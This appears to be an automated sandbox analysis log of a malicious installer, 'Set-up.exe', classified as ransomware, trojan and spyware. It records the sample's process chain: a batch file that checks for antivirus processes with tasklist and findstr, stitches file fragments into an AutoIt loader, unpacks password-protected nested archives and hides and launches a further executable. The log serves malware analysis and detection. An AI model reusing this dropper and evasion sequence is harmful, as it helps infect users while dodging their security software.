    Source: Set-up.exe, 00000000.00000003.2163100883.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs Set-up.exe
    Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@58/45@5/2
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: 16_2_00409606 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,16_2_00409606
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0011AC74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,20_2_0011AC74
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_00121D04 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,20_2_00121D04
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: 16_2_004020BF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,16_2_004020BF
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6996:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5164:120:WilError_03
    Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\nsqA23E.tmpJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Crest Crest.bat & Crest.bat
    Source: Set-up.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Users\user\Desktop\Set-up.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
    Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Crest Crest.bat & Crest.bat
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 506033
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "RubberBrilliantPoliceOperator" Count
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Lil + ..\Labeled + ..\Warren + ..\Current + ..\Endless + ..\Towers + ..\Based W
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\506033\Limitations.pif Limitations.pif W
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifProcess created: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exe "C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exe"
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p29586644319935208542739921766 -oextracted
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_11.zip -oextracted
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_10.zip -oextracted
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_9.zip -oextracted
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_8.zip -oextracted
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "Installer.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\Installer.exe "Installer.exe"
    Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Crest Crest.bat & Crest.batJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 506033Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "RubberBrilliantPoliceOperator" Count Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Lil + ..\Labeled + ..\Warren + ..\Current + ..\Endless + ..\Towers + ..\Based WJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\506033\Limitations.pif Limitations.pif WJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifProcess created: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exe "C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exe"Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p29586644319935208542739921766 -oextractedJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_11.zip -oextractedJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_10.zip -oextractedJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_9.zip -oextractedJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_8.zip -oextractedJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextractedJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextractedJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextractedJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "Installer.exe"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\Installer.exe "Installer.exe" Jump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\mode.comSection loaded: ulib.dllJump to behavior
    Source: C:\Windows\System32\mode.comSection loaded: ureg.dllJump to behavior
    Source: C:\Windows\System32\mode.comSection loaded: fsutilext.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
    Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: netutils.dll
    Source: C:\Users\user\Desktop\Set-up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Set-up.exeStatic file information: File size 56623098 > 1048576
    Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
